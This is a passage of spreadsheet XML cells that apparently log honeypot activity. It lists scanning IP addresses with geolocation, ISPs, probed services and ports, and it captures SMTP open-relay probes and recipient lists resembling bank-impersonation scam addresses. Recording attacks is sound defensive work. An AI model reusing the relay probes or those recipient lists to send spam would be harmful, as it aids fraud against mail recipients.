    <t>{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'RSET', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'from:&lt;spameri@tiscali.it&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'to:&lt;spameri@tiscali.it&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'DATA', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '103.113.68.70_x000D_
To: spameri@tiscali.it_x000D_
Date: Wed, 19 Mar 2025 15:18:29 -0700_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'QUIT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '103.211.202.140_x000D_
To: spameri@tiscali.it_x000D_
Date: Wed, 19 Mar 2025 16:04:59 -0700_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '66.94.127.183_x000D_
To: spameri@tiscali.it_x000D_
Date: Mon, 24 Mar 2025 00:49:48 -0700_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'LOGIN', 'command': 'AUTH', 'data': 'None'}}&amp;&amp;NA&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '154.26.156.60_x000D_
To: spameri@tiscali.it_x000D_
Date: Fri, 28 Mar 2025 15:06:38 -0700_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '95.164.21.98_x000D_
To: spameri@tiscali.it_x000D_
Date: Mon, 31 Mar 2025 04:47:53 -0700_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '154.26.156.60_x000D_
To: spameri@tiscali.it_x000D_
Date: Tue, 1 Apr 2025 04:52:58 -0700_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '154.26.156.60_x000D_
To: spameri@tiscali.it_x000D_
Date: Tue, 1 Apr 2025 06:02:32 -0700_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'FROM:&lt;info@yahoo.com&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;union_bnk_customer_service@outlook.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;jona_okons@yahoo.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;princeokons477@gmail.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;unionbanknigplc@mail.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;jonathanokons@yahoo.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '122.170.7.108_x000D_
To: spameri@tiscali.it_x000D_
Date: Fri, 4 Apr 2025 15:00:17 -0700_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '103.211.202.140_x000D_
To: spameri@tiscali.it_x000D_
Date: Fri, 4 Apr 2025 16:07:05 -0700_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'FROM:&lt;info@yahoo.comy&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'FROM:&lt;no-reply@misa.vn&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;garbasani5555@hotmail.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;ikkpulukestuff@aol.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;dr.jackins@gmail.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;kendo_forreal@yahoo.com.sg&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;kendoforreal@yandex.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;ikkpulukestuff@hotmail.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '154.26.156.60_x000D_
To: spameri@tiscali.it_x000D_
Date: Mon, 14 Apr 2025 00:41:31 -0700_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '91.194.11.82_x000D_
To: spameri@tiscali.it_x000D_
Date: Wed, 16 Apr 2025 16:12:49 -0700_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}</t>
  </si>
  <si>
    <t>::ffff:c3d3:bf29</t>
  </si>
  <si>
    <t>7b6cbdf1943f1154c7ee4ad1fa1764f4</t>
  </si>
  <si>
    <t>68.37.173.70</t>
  </si>
  <si>
    <t>c-68-37-173-70.hsd1.mi.comcast.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>Chelsea</t>
  </si>
  <si>
    <t>4988628</t>
  </si>
  <si>
    <t>48118</t>
  </si>
  <si>
    <t>42.3788</t>
  </si>
  <si>
    <t>-84.0802</t>
  </si>
  <si>
    <t>::ffff:4425:ad46</t>
  </si>
  <si>
    <t>5783da841be17cf08e01a2cb6ac3fcb0</t>
  </si>
  <si>
    <t>59.182.136.7</t>
  </si>
  <si>
    <t>1264154</t>
  </si>
  <si>
    <t>11.042</t>
  </si>
  <si>
    <t>76.0815</t>
  </si>
  <si>
    <t>::ffff:3bb6:8807</t>
  </si>
  <si>
    <t>32c4cb23df681c15f62f4782ce4648bf</t>
  </si>
  <si>
    <t>117.217.21.255</t>
  </si>
  <si>
    <t>::ffff:75d9:15ff</t>
  </si>
  <si>
    <t>5d41bc82be469cb560dc1c6a27409a58</t>
  </si>
  <si>
    <t>61.3.219.172</t>
  </si>
  <si>
    <t>::ffff:3d03:dbac</t>
  </si>
  <si>
    <t>b3eb92078aa36393b665a3f7ec543dc6</t>
  </si>
  <si>
    <t>59.127.210.50</t>
  </si>
  <si>
    <t>59-127-210-50.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:3b7f:d232</t>
  </si>
  <si>
    <t>32c669333d67281c3fee08e72bc1a609</t>
  </si>
  <si>
    <t>117.241.181.207</t>
  </si>
  <si>
    <t>::ffff:75f1:b5cf</t>
  </si>
  <si>
    <t>d662ecd4b2afd19a5d2b94078d174221</t>
  </si>
  <si>
    <t>103.114.137.154</t>
  </si>
  <si>
    <t>-6.22639</t>
  </si>
  <si>
    <t>106.832</t>
  </si>
  <si>
    <t>4787</t>
  </si>
  <si>
    <t>PT Cyberindo Aditama</t>
  </si>
  <si>
    <t>Indonesia Network Information Center</t>
  </si>
  <si>
    <t>::ffff:6772:899a</t>
  </si>
  <si>
    <t>0144407471102c1ed0eca7beddcadeab</t>
  </si>
  <si>
    <t>103.154.114.130</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H44&amp;&amp;SMA-LAB_LDAP_H47&amp;&amp;SMA-LAB_SOCKS5_H24&amp;&amp;SMA-LAB_VNC_H12&amp;&amp;SMA-LAB_SMB_H5&amp;&amp;SMA-LAB_HTTP_H21&amp;&amp;SMA-LAB_SSH_H42&amp;&amp;SMA-LAB_PJL_H22&amp;&amp;SMA-LAB_MT-CPA_H44&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H9&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_SMB_H2&amp;&amp;SMA-LAB_MSSQL_H2&amp;&amp;SMA-LAB_MSSQL_H13</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;389&amp;&amp;1080&amp;&amp;5900&amp;&amp;445&amp;&amp;80&amp;&amp;22&amp;&amp;9100&amp;&amp;30531&amp;&amp;3306</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.154.114.130,64433)}&amp;&amp;{Data_SMB:Incoming connection (103.154.114.130,55583)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.154.114.130,50154)}&amp;&amp;{Data_SMB:Incoming connection (103.154.114.130,50340)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SMB:Incoming connection (103.154.114.130,56813)}&amp;&amp;{Data_SMB:Incoming connection (103.154.114.130,57111)}</t>
  </si>
  <si>
    <t>::ffff:679a:7282</t>
  </si>
  <si>
    <t>2a6a158ef82e37ebb9ec43b4d43c9629</t>
  </si>
  <si>
    <t>37.255.223.8</t>
  </si>
  <si>
    <t>::ffff:25ff:df08</t>
  </si>
  <si>
    <t>94e6cdfd7488d5673ba854896478a4b1</t>
  </si>
  <si>
    <t>197.48.109.44</t>
  </si>
  <si>
    <t>30.0383</t>
  </si>
  <si>
    <t>31.2102</t>
  </si>
  <si>
    <t>8452</t>
  </si>
  <si>
    <t>TE-AS</t>
  </si>
  <si>
    <t>TE Data</t>
  </si>
  <si>
    <t>::ffff:c530:6d2c</t>
  </si>
  <si>
    <t>bc4cf08da015050d7a9758c3fd5cd985</t>
  </si>
  <si>
    <t>188.219.166.214</t>
  </si>
  <si>
    <t>net-188-219-166-214.cust.vodafonedsl.it&amp;&amp;NA</t>
  </si>
  <si>
    <t>20121</t>
  </si>
  <si>
    <t>45.4642</t>
  </si>
  <si>
    <t>9.18998</t>
  </si>
  <si>
    <t>30722</t>
  </si>
  <si>
    <t>Vodafone Italia S.p.A.</t>
  </si>
  <si>
    <t>VODAFONE</t>
  </si>
  <si>
    <t>::ffff:bcdb:a6d6</t>
  </si>
  <si>
    <t>8b99ad73fc778fdeed51b65336e06dd2</t>
  </si>
  <si>
    <t>78.148.247.221</t>
  </si>
  <si>
    <t>host-78-148-247-221.as13285.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_PJL_HC1&amp;&amp;SMA-LAB_PJL_H47</t>
  </si>
  <si>
    <t>9100&amp;&amp;23&amp;&amp;NA&amp;&amp;80</t>
  </si>
  <si>
    <t>Barnsley</t>
  </si>
  <si>
    <t>Wortley</t>
  </si>
  <si>
    <t>2633514</t>
  </si>
  <si>
    <t>53.4833</t>
  </si>
  <si>
    <t>-1.53333</t>
  </si>
  <si>
    <t>{Data_PJL:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;NA&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}</t>
  </si>
  <si>
    <t>::ffff:4e94:f7dd</t>
  </si>
  <si>
    <t>f1802b245cf486a5c0c5458d4c519506</t>
  </si>
  <si>
    <t>114.40.166.129</t>
  </si>
  <si>
    <t>114-40-166-129.dynamic-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:7228:a681</t>
  </si>
  <si>
    <t>abef1d9f7b645ffda74c2086f208bf83</t>
  </si>
  <si>
    <t>95.228.113.135</t>
  </si>
  <si>
    <t>host-95-228-113-135.business.telecomitalia.it&amp;&amp;NA</t>
  </si>
  <si>
    <t>2009-01-15</t>
  </si>
  <si>
    <t>::ffff:5fe4:7187</t>
  </si>
  <si>
    <t>0f9e99a4f80c388b78c34919af29e9cc</t>
  </si>
  <si>
    <t>116.97.39.181</t>
  </si>
  <si>
    <t>VIETEL-AS-AP</t>
  </si>
  <si>
    <t>::ffff:7461:27b5</t>
  </si>
  <si>
    <t>ee3df95487dd8669738e43564c8bd1f9</t>
  </si>
  <si>
    <t>103.163.36.102</t>
  </si>
  <si>
    <t>Babat</t>
  </si>
  <si>
    <t>1650888</t>
  </si>
  <si>
    <t>-7.11282</t>
  </si>
  <si>
    <t>112.164</t>
  </si>
  <si>
    <t>138886</t>
  </si>
  <si>
    <t>PT Data Buana Nusantara</t>
  </si>
  <si>
    <t>PT Jaringan Buana Nusantara</t>
  </si>
  <si>
    <t>2021-02-19</t>
  </si>
  <si>
    <t>IDNIC-DBNNET-ID</t>
  </si>
  <si>
    <t>::ffff:67a3:2466</t>
  </si>
  <si>
    <t>edf3a6f6a473e195c803d51f4298896f</t>
  </si>
  <si>
    <t>116.88.98.7</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>Marine Parade</t>
  </si>
  <si>
    <t>1882778</t>
  </si>
  <si>
    <t>449536</t>
  </si>
  <si>
    <t>1.32429</t>
  </si>
  <si>
    <t>103.893</t>
  </si>
  <si>
    <t>55430</t>
  </si>
  <si>
    <t>Starhub Internet Pte Ltd</t>
  </si>
  <si>
    <t>StarHub Cable Vision Ltd</t>
  </si>
  <si>
    <t>StarHub Ltd NGNBN Services</t>
  </si>
  <si>
    <t>::ffff:7458:6207</t>
  </si>
  <si>
    <t>04bfe40c6c9f3bc73d9be8ba1ffcf82a</t>
  </si>
  <si>
    <t>88.173.88.75</t>
  </si>
  <si>
    <t>NA&amp;&amp;88-173-88-75.subs.proxad.net</t>
  </si>
  <si>
    <t>PAC</t>
  </si>
  <si>
    <t>Provence</t>
  </si>
  <si>
    <t>Bouches-du-Rhône</t>
  </si>
  <si>
    <t>Marseille (Saint-Antoine)</t>
  </si>
  <si>
    <t>2995469</t>
  </si>
  <si>
    <t>13015</t>
  </si>
  <si>
    <t>43.3715</t>
  </si>
  <si>
    <t>5.36345</t>
  </si>
  <si>
    <t>::ffff:58ad:584b</t>
  </si>
  <si>
    <t>a92c382f5b712b81d395ff9045fb7410</t>
  </si>
  <si>
    <t>124.46.206.200</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H33</t>
  </si>
  <si>
    <t>Iksan-si</t>
  </si>
  <si>
    <t>1843663</t>
  </si>
  <si>
    <t>54535</t>
  </si>
  <si>
    <t>35.9444</t>
  </si>
  <si>
    <t>126.96</t>
  </si>
  <si>
    <t>17583</t>
  </si>
  <si>
    <t>Keumgang Cable Network</t>
  </si>
  <si>
    <t>Kcnnet</t>
  </si>
  <si>
    <t>::ffff:7c2e:cec8</t>
  </si>
  <si>
    <t>28a13dda020534e72cfc3519f957a9a6</t>
  </si>
  <si>
    <t>42.2.33.60</t>
  </si>
  <si>
    <t>42-2-33-060.static.netvigator.com&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:2a02:213c</t>
  </si>
  <si>
    <t>0dd4a96857e71780fc4004eda8a6c538</t>
  </si>
  <si>
    <t>103.170.245.110</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H16&amp;&amp;SMA-LAB_REDIS_H3&amp;&amp;SMA-LAB_MSSQL_H44&amp;&amp;SMA-LAB_MSSQL_H2&amp;&amp;SMA-LAB_SMB_H16&amp;&amp;SMA-LAB_MSSQL_H23&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H33</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;6379&amp;&amp;445</t>
  </si>
  <si>
    <t>Bengaluru (Manjunath Nagar Chikkalsandra)</t>
  </si>
  <si>
    <t>12.9947</t>
  </si>
  <si>
    <t>77.5504</t>
  </si>
  <si>
    <t>142513</t>
  </si>
  <si>
    <t>LEVOTEL BIGNET SOLUTIONS PVT LTD</t>
  </si>
  <si>
    <t>Levotel Bignet Solutions PVT LTD</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.170.245.110,63956)}&amp;&amp;{Data_SMB:Incoming connection (103.170.245.110,64694)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.170.245.110,51792)}&amp;&amp;{Data_SMB:Incoming connection (103.170.245.110,52770)}</t>
  </si>
  <si>
    <t>::ffff:67aa:f56e</t>
  </si>
  <si>
    <t>e980b0f8810bc5da6f361f04c2f33bb5</t>
  </si>
  <si>
    <t>59.19.217.125</t>
  </si>
  <si>
    <t>Dongnae</t>
  </si>
  <si>
    <t>35.2075</t>
  </si>
  <si>
    <t>129.083</t>
  </si>
  <si>
    <t>::ffff:3b13:d97d</t>
  </si>
  <si>
    <t>b980f43cb9575e91c5ba7a2b763524b3</t>
  </si>
  <si>
    <t>176.65.138.63</t>
  </si>
  <si>
    <t>50.8933</t>
  </si>
  <si>
    <t>6.05805</t>
  </si>
  <si>
    <t>215462</t>
  </si>
  <si>
    <t>Noel Nayasha Materke</t>
  </si>
  <si>
    <t>Mario Networks Limited</t>
  </si>
  <si>
    <t>::ffff:b041:8a3f</t>
  </si>
  <si>
    <t>65628b6f1859e41e14b5e1ec0adb9d5d</t>
  </si>
  <si>
    <t>216.245.112.170</t>
  </si>
  <si>
    <t>MS</t>
  </si>
  <si>
    <t>Mississippi</t>
  </si>
  <si>
    <t>Panola</t>
  </si>
  <si>
    <t>Batesville</t>
  </si>
  <si>
    <t>4417130</t>
  </si>
  <si>
    <t>38606</t>
  </si>
  <si>
    <t>34.3087</t>
  </si>
  <si>
    <t>-89.9258</t>
  </si>
  <si>
    <t>55120</t>
  </si>
  <si>
    <t>Tallahatchie Valley Internet Services, LLC</t>
  </si>
  <si>
    <t>::ffff:d8f5:70aa</t>
  </si>
  <si>
    <t>26cb05caa0f8b7505fd779a116d3693b</t>
  </si>
  <si>
    <t>196.251.72.31</t>
  </si>
  <si>
    <t>SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H22</t>
  </si>
  <si>
    <t>5900&amp;&amp;45800&amp;&amp;43604&amp;&amp;49034&amp;&amp;40214&amp;&amp;46728&amp;&amp;33034&amp;&amp;NA&amp;&amp;59544</t>
  </si>
  <si>
    <t>401120</t>
  </si>
  <si>
    <t>cheapy.host LLC</t>
  </si>
  <si>
    <t>Internet Secuirty Cheapyhost</t>
  </si>
  <si>
    <t>::ffff:c4fb:481f</t>
  </si>
  <si>
    <t>520cee457656c35a2e6e2bd42da08b19</t>
  </si>
  <si>
    <t>186.53.5.209</t>
  </si>
  <si>
    <t>UY</t>
  </si>
  <si>
    <t>Uruguay</t>
  </si>
  <si>
    <t>Artigas</t>
  </si>
  <si>
    <t>3443758</t>
  </si>
  <si>
    <t>-30.4</t>
  </si>
  <si>
    <t>-56.4667</t>
  </si>
  <si>
    <t>6057</t>
  </si>
  <si>
    <t>AS6057</t>
  </si>
  <si>
    <t>Administracion Nacional de Telecomunicaciones</t>
  </si>
  <si>
    <t>::ffff:ba35:5d1</t>
  </si>
  <si>
    <t>1c5872a2b86e7d5c22cef071ce9b1e2c</t>
  </si>
  <si>
    <t>73.244.6.38</t>
  </si>
  <si>
    <t>Duval</t>
  </si>
  <si>
    <t>Jacksonville</t>
  </si>
  <si>
    <t>4160021</t>
  </si>
  <si>
    <t>32255</t>
  </si>
  <si>
    <t>30.3322</t>
  </si>
  <si>
    <t>-81.6556</t>
  </si>
  <si>
    <t>::ffff:49f4:626</t>
  </si>
  <si>
    <t>155a72be3a502219f405f11a92ff29ab</t>
  </si>
  <si>
    <t>117.216.54.20</t>
  </si>
  <si>
    <t>::ffff:75d8:3614</t>
  </si>
  <si>
    <t>5224b8d791591f85d27c4400dcd7ea82</t>
  </si>
  <si>
    <t>59.184.214.26</t>
  </si>
  <si>
    <t>Khadki</t>
  </si>
  <si>
    <t>1267195</t>
  </si>
  <si>
    <t>18.5635</t>
  </si>
  <si>
    <t>73.8521</t>
  </si>
  <si>
    <t>::ffff:3bb8:d61a</t>
  </si>
  <si>
    <t>9f12e0f0bddbd7333ecba3fdb150a1f5</t>
  </si>
  <si>
    <t>116.75.197.130</t>
  </si>
  <si>
    <t>::ffff:744b:c582</t>
  </si>
  <si>
    <t>457928ee9e226f92e20696ba2507f823</t>
  </si>
  <si>
    <t>117.210.222.137</t>
  </si>
  <si>
    <t>::ffff:75d2:de89</t>
  </si>
  <si>
    <t>1c1c06057dec09e06478b8f04a260827</t>
  </si>
  <si>
    <t>122.116.52.49</t>
  </si>
  <si>
    <t>NA&amp;&amp;122-116-52-49.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>::ffff:7a74:3431</t>
  </si>
  <si>
    <t>08e08910a4544ad195f60a1eb2c954a5</t>
  </si>
  <si>
    <t>117.203.3.233</t>
  </si>
  <si>
    <t>::ffff:75cb:3e9</t>
  </si>
  <si>
    <t>813df47c03067c285830c27565aaeb89</t>
  </si>
  <si>
    <t>112.119.249.155</t>
  </si>
  <si>
    <t>HKTIMS-AP</t>
  </si>
  <si>
    <t>::ffff:7077:f99b</t>
  </si>
  <si>
    <t>23575a133400435bfeaa32e75ecdfbd8</t>
  </si>
  <si>
    <t>120.56.150.209</t>
  </si>
  <si>
    <t>::ffff:7838:96d1</t>
  </si>
  <si>
    <t>52f30f5c76d2ece8aade42b5a13f9563</t>
  </si>
  <si>
    <t>117.251.169.153</t>
  </si>
  <si>
    <t>::ffff:75fb:a999</t>
  </si>
  <si>
    <t>b8e75ae77015712d9e495cbf1114af40</t>
  </si>
  <si>
    <t>179.157.172.184</t>
  </si>
  <si>
    <t>Nova Iguaçu</t>
  </si>
  <si>
    <t>3456160</t>
  </si>
  <si>
    <t>-22.7592</t>
  </si>
  <si>
    <t>-43.4511</t>
  </si>
  <si>
    <t>::ffff:b39d:acb8</t>
  </si>
  <si>
    <t>b0ad43c2811118e67dd22b436f079b10</t>
  </si>
  <si>
    <t>117.233.167.75</t>
  </si>
  <si>
    <t>::ffff:75e9:a74b</t>
  </si>
  <si>
    <t>02869913d214c2021a0a4c378afcb240</t>
  </si>
  <si>
    <t>59.183.20.112</t>
  </si>
  <si>
    <t>::ffff:3bb7:1470</t>
  </si>
  <si>
    <t>5eead177f8150c5fe540097e5c7beee8</t>
  </si>
  <si>
    <t>1.34.230.160</t>
  </si>
  <si>
    <t>1-34-230-160.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_MT-CPA_H43&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H22</t>
  </si>
  <si>
    <t>23&amp;&amp;80&amp;&amp;6789&amp;&amp;NA&amp;&amp;9100</t>
  </si>
  <si>
    <t>Hsinchu County</t>
  </si>
  <si>
    <t>Zhubei</t>
  </si>
  <si>
    <t>1677112</t>
  </si>
  <si>
    <t>24.8383</t>
  </si>
  <si>
    <t>121.008</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '109.123.229.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:122:e6a0</t>
  </si>
  <si>
    <t>abc86ffd79f9532b59648d976f6600c0</t>
  </si>
  <si>
    <t>88.125.85.207</t>
  </si>
  <si>
    <t>88-125-85-207.subs.proxad.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>NAQ</t>
  </si>
  <si>
    <t>Nouvelle-Aquitaine</t>
  </si>
  <si>
    <t>Charente-Maritime</t>
  </si>
  <si>
    <t>Saint-Martin-de-Ré</t>
  </si>
  <si>
    <t>2978361</t>
  </si>
  <si>
    <t>17410</t>
  </si>
  <si>
    <t>46.2031</t>
  </si>
  <si>
    <t>-1.36746</t>
  </si>
  <si>
    <t>Free</t>
  </si>
  <si>
    <t>::ffff:587d:55cf</t>
  </si>
  <si>
    <t>bb4598db81fd942ed47571d2c0a26d0f</t>
  </si>
  <si>
    <t>59.183.149.84</t>
  </si>
  <si>
    <t>::ffff:3bb7:9554</t>
  </si>
  <si>
    <t>91084b61e4b245b1a45543098921cec7</t>
  </si>
  <si>
    <t>2.187.128.211</t>
  </si>
  <si>
    <t>Zanjan</t>
  </si>
  <si>
    <t>111453</t>
  </si>
  <si>
    <t>36.683</t>
  </si>
  <si>
    <t>48.5087</t>
  </si>
  <si>
    <t>TCI</t>
  </si>
  <si>
    <t>Zanjan telecom company</t>
  </si>
  <si>
    <t>::ffff:2bb:80d3</t>
  </si>
  <si>
    <t>5e7514676b54069a8d4dffc16cccb054</t>
  </si>
  <si>
    <t>147.185.132.231</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_REDIS_H33&amp;&amp;SMA-LAB_SMB_H33&amp;&amp;SMA-LAB_MT-CPA_H33&amp;&amp;SMA-LAB_SNMP_H35&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_IMAP_H29&amp;&amp;SMA-LAB_RDP_H42&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_SNMP_H17&amp;&amp;SMA-LAB_FTP_H37&amp;&amp;SMA-LAB_MT-CPA_H7&amp;&amp;SMA-LAB_RDP_H47&amp;&amp;SMA-LAB_ORACLE_H40&amp;&amp;SMA-LAB_IMAP_H5&amp;&amp;SMA-LAB_SMB_H14&amp;&amp;SMA-LAB_RDP_H29&amp;&amp;SMA-LAB_SOCKS5_H26&amp;&amp;SMA-LAB_SNMP_H4&amp;&amp;SMA-LAB_SNMP_H15&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_RDP_H37&amp;&amp;SMA-LAB_MT-CPA_H12&amp;&amp;SMA-LAB_POP3_H41&amp;&amp;SMA-LAB_FTP_H34&amp;&amp;SMA-LAB_IMAP_H22&amp;&amp;SMA-LAB_IMAP_H23&amp;&amp;SMA-LAB_IMAP_H26&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_LDAP_H33&amp;&amp;SMA-LAB_SIP_H11&amp;&amp;SMA-LAB_MT-CPA_H17&amp;&amp;SMA-LAB_RDP_H